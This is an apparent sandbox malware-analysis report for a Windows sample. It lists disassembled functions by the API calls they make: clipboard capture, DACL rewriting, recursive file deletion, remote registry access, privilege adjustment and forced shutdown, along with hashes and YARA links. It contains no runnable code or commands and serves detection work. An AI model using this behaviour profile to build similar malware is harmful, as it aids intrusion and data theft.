                                                                                                                                                                        • Opcode Fuzzy Hash: 2a521ca8885ecc5b9376aa77a1fc4a6f434d3e8a99dbf66679c91ae0dbfdce4b
                                                                                                                                                                        • Instruction Fuzzy Hash: 1F818B7192020AABDF11DFA4EC4AFFE7BB9EF05310F14422DF915A61A1DB708965CB60
                                                                                                                                                                        Function 002C14AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002C1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002C1A60
                                                                                                                                                                          • Part of subcall function 002C1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A6C
                                                                                                                                                                          • Part of subcall function 002C1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A7B
                                                                                                                                                                          • Part of subcall function 002C1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A82
                                                                                                                                                                          • Part of subcall function 002C1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002C1A99
                                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002C1518
                                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002C154C
                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 002C1563
                                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 002C159D
                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002C15B9
                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 002C15D0
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 002C15D8
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 002C15DF
                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002C1600
                                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 002C1607
                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002C1636
                                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002C1658
                                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002C166A
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C1691
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C1698
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C16A1
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C16A8
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C16B1
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C16B8
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 002C16C4
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C16CB
                                                                                                                                                                          • Part of subcall function 002C1ADF: GetProcessHeap.KERNEL32(00000008,002C14FD,?,00000000,?,002C14FD,?), ref: 002C1AED
                                                                                                                                                                          • Part of subcall function 002C1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002C14FD,?), ref: 002C1AF4
                                                                                                                                                                          • Part of subcall function 002C1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002C14FD,?), ref: 002C1B03
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4175595110-0
                                                                                                                                                                        • Opcode ID: 29373fe0d2636908cb0d87f52d76b6014041962993c55f7c8192b7a7ec0c7994
                                                                                                                                                                        • Instruction ID: 424aa69e3f530a1455c5ba431a6f20702cfd7d33a218a43f97c8df3df581a762
                                                                                                                                                                        • Opcode Fuzzy Hash: 29373fe0d2636908cb0d87f52d76b6014041962993c55f7c8192b7a7ec0c7994
                                                                                                                                                                        • Instruction Fuzzy Hash: 0B71807191020AABDF10DFA4EC49FEEBBBDBF05350F184629E915E7191D7309925CBA0
                                                                                                                                                                        Function 002DF55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenClipboard.USER32(002FDCD0), ref: 002DF586
                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 002DF594
                                                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 002DF5A0
                                                                                                                                                                        • CloseClipboard.USER32 ref: 002DF5AC
                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 002DF5E4
                                                                                                                                                                        • CloseClipboard.USER32 ref: 002DF5EE
                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 002DF619
                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 002DF626
                                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 002DF62E
                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 002DF63F
                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 002DF67F
                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 002DF695
                                                                                                                                                                        • GetClipboardData.USER32(0000000F), ref: 002DF6A1
                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 002DF6B2
                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 002DF6D4
                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 002DF6F1
                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 002DF72F
                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 002DF750
                                                                                                                                                                        • CountClipboardFormats.USER32 ref: 002DF771
                                                                                                                                                                        • CloseClipboard.USER32 ref: 002DF7B6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 420908878-0
                                                                                                                                                                        • Opcode ID: 7ed9bcd6a7cfd0ba3be59959f579ecec34175b08c6bcc0bd9c82692df14ca94b
                                                                                                                                                                        • Instruction ID: 678bacac74ceed2f02148044e46e8549cbe8b7ab8616282b071be4a2fe3ee7dd
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ed9bcd6a7cfd0ba3be59959f579ecec34175b08c6bcc0bd9c82692df14ca94b
                                                                                                                                                                        • Instruction Fuzzy Hash: BF61BF312142029FD300EF20E988F7AB7A9AF84754F14456AF857C73A2DB71ED95CBA1
                                                                                                                                                                        Function 002D73D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 002D7403
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 002D7457
                                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002D7493
                                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002D74BA
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 002D74F7
                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 002D7524
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                        • API String ID: 3830820486-3289030164
                                                                                                                                                                        • Opcode ID: 7f9aac35eac7fc81bb97845240d62d3e240156bbf751cd0df5f536ba859c4472
                                                                                                                                                                        • Instruction ID: b39eb1afa745d4a21e43a94acfde7a35871d4ad9a3f701a2d418bfa040b55e6c
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f9aac35eac7fc81bb97845240d62d3e240156bbf751cd0df5f536ba859c4472
                                                                                                                                                                        • Instruction Fuzzy Hash: 92D14E72518344AFC310EF64C885EBBB7ECAF88704F44491EF585D6292EB74DA94CB62
                                                                                                                                                                        Function 002DA087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 002DA0A8
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 002DA0E6
                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 002DA100
                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 002DA118
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 002DA123
                                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 002DA13F
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002DA18F
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00327B94), ref: 002DA1AD
                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 002DA1B7
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 002DA1C4
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 002DA1D4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                        • API String ID: 1409584000-438819550
                                                                                                                                                                        • Opcode ID: 634439d71141b1df380552c180a9705cc9d313080ee3633910e92e20fdd8cd2c
                                                                                                                                                                        • Instruction ID: df636892aefcc616847d0f6e0b0f1fe56c61024b7e965a3caceb44589481859c
                                                                                                                                                                        • Opcode Fuzzy Hash: 634439d71141b1df380552c180a9705cc9d313080ee3633910e92e20fdd8cd2c
                                                                                                                                                                        • Instruction Fuzzy Hash: 3131D23151121A6ADF10AFB4EC4DEEE73ADAF05360F0000A2E819D2190EB74DE65CF61
                                                                                                                                                                        Function 002D4763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002D4785
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D47B2
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 002D47E2
                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002D4803
                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 002D4813
                                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002D489A
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002D48A5
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002D48B0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                                                        • API String ID: 1149970189-3457252023
                                                                                                                                                                        • Opcode ID: cb601f250dace218283ebca225a5c2b3303526a2471e3dd48b469ce427b197ca
                                                                                                                                                                        • Instruction ID: 974d1ce6b19bdabadf60ef39b96b4185addeac55bd10824c304d64947a98ed3a
                                                                                                                                                                        • Opcode Fuzzy Hash: cb601f250dace218283ebca225a5c2b3303526a2471e3dd48b469ce427b197ca
                                                                                                                                                                        • Instruction Fuzzy Hash: 4A31D47551024AABDB20AFA0DC49FEB37BDEF89750F1040B6F609D21A1E7709A54CF24
                                                                                                                                                                        Function 002DA1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 002DA203
                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 002DA25E
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 002DA269
                                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 002DA285
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002DA2D5
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00327B94), ref: 002DA2F3
                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 002DA2FD
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 002DA30A
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 002DA31A
                                                                                                                                                                          • Part of subcall function 002CE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002CE3B4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                        • API String ID: 2640511053-438819550
                                                                                                                                                                        • Opcode ID: 9a6778ecd2641a2b8496a08cb2607c8461afa57880ad99847bed771d194144ac
                                                                                                                                                                        • Instruction ID: c52ad951e5ca7f6d6d62991577313e686e73cf351c96b6202b6348eaacfa72e1
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a6778ecd2641a2b8496a08cb2607c8461afa57880ad99847bed771d194144ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C31123151121A6ACF10AFA5EC0DEEE77AEAF45360F1041A2F810A32D0DB71DEA5CF55
                                                                                                                                                                        Function 002EC8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002ED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002EC10E,?,?), ref: 002ED415
                                                                                                                                                                          • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED451
                                                                                                                                                                          • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4C8
                                                                                                                                                                          • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4FE
                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002EC99E
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 002ECA09
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 002ECA2D
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002ECA8C
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002ECB47
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 002ECBB4
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 002ECC49
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 002ECC9A
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 002ECD43
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 002ECDE2
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 002ECDEF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3102970594-0
                                                                                                                                                                        • Opcode ID: 4488f18969d1dbf28e04c0abed3851eebef048672240c67cd7e2233834942960
                                                                                                                                                                        • Instruction ID: c5d810b057c4baceb5bd2093dcac5b97539dcb6a5f7f382dd63e28d7f82e072c
                                                                                                                                                                        • Opcode Fuzzy Hash: 4488f18969d1dbf28e04c0abed3851eebef048672240c67cd7e2233834942960
                                                                                                                                                                        • Instruction Fuzzy Hash: 92028171614241AFC714DF29C895E2ABBE5EF49318F5884ADF849CB2A2CB31EC52CF51
                                                                                                                                                                        Function 002CD921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00265851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002655D1,?,?,002A4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00265871
                                                                                                                                                                          • Part of subcall function 002CEAB0: GetFileAttributesW.KERNEL32(?,002CD840), ref: 002CEAB1
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 002CD9CD
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 002CDA88
                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 002CDA9B
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 002CDAB8
                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 002CDAE2
                                                                                                                                                                          • Part of subcall function 002CDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,002CDAC7,?,?), ref: 002CDB5D
                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 002CDAFE
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 002CDB0F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                        • API String ID: 1946585618-1173974218
                                                                                                                                                                        • Opcode ID: 02936d027e805fd9f3fef28ce1bee6f653e277f8826e94b89bbc48ea8aa93e6b
                                                                                                                                                                        • Instruction ID: 2e1dc6dcbb2673a886ef54830962e2d9570df10119e7a3353ee51fc97f822e1e
                                                                                                                                                                        • Opcode Fuzzy Hash: 02936d027e805fd9f3fef28ce1bee6f653e277f8826e94b89bbc48ea8aa93e6b
                                                                                                                                                                        • Instruction Fuzzy Hash: 6C615E3181110DAECF05EFA0D996EEDB7B5AF14304F6041A9E402B7196DB316F99CFA0
                                                                                                                                                                        Function 002DF7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1737998785-0
                                                                                                                                                                        • Opcode ID: f581d47e5f13ad2f2989e58e5f97dd36062e883fbd551e952943c91cd7ef60e7
                                                                                                                                                                        • Instruction ID: b2eb0f09b057702c24bca6ab303f548a69220143bb40e73547ce14c39098bac9
                                                                                                                                                                        • Opcode Fuzzy Hash: f581d47e5f13ad2f2989e58e5f97dd36062e883fbd551e952943c91cd7ef60e7
                                                                                                                                                                        • Instruction Fuzzy Hash: 1141BD34614602AFD710CF15E988B25BBE5EF04368F15C0AAE81ACB762C735EC52CB95
                                                                                                                                                                        Function 002CF20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002C2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C205A
                                                                                                                                                                          • Part of subcall function 002C2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C2087
                                                                                                                                                                          • Part of subcall function 002C2010: GetLastError.KERNEL32 ref: 002C2097
                                                                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 002CF249
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
